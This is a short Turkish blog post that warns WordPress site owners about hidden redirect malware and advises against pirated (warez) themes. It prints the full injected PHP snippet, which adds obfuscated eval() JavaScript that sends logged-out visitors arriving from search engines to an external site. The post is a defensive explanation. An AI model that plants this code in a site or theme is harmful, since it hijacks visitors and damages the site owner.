Siteniz başka bir siteye yönleniyor olabilir!
Merhaba arkadaşlar.
Bu yazımızda size gizli yönlendirmeden ve bundan nasıl korunacağınızdan bahsedeceğim. Genelde wordpress kullanıcılarının başına bela olan Iframe veya türevi kodlar, sitenizin farkında olmadan başka sitelere yönlenmesine yol açıyor. Sistem gerçekten çok zekice işliyor. Nasıl işlediğine bakacak olursak;
- Iframe veya türevi kod sitenize bulaşıyor. (Wordpress için genelde function.php)
- Sitenize herhangi bir arama motorundan gelen yada üye girişi yapılmamış kişi gördüğü zaman siteyi farklı bir yere yönlendiriyor.
- Bu şekilde virüs sahibi kişiler organik hit kazanmış oluyor.
Birde koda bakalım öyle değil mi? :)
<?php add_action('get_footer', 'add_sscounter'); function add_sscounter(){ echo '<!--scounter-->'; if(function_exists('is_user_logged_in')){ if(time()%2 == 0 && !is_user_logged_in()){ echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\'+e(c)+'\','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>"; } } } ?>
Bunlardan korunmak için seçtiğiniz temanın warez olmamasına lütfen dikkat edin.
Iyi çalışmalar.
Yorumlar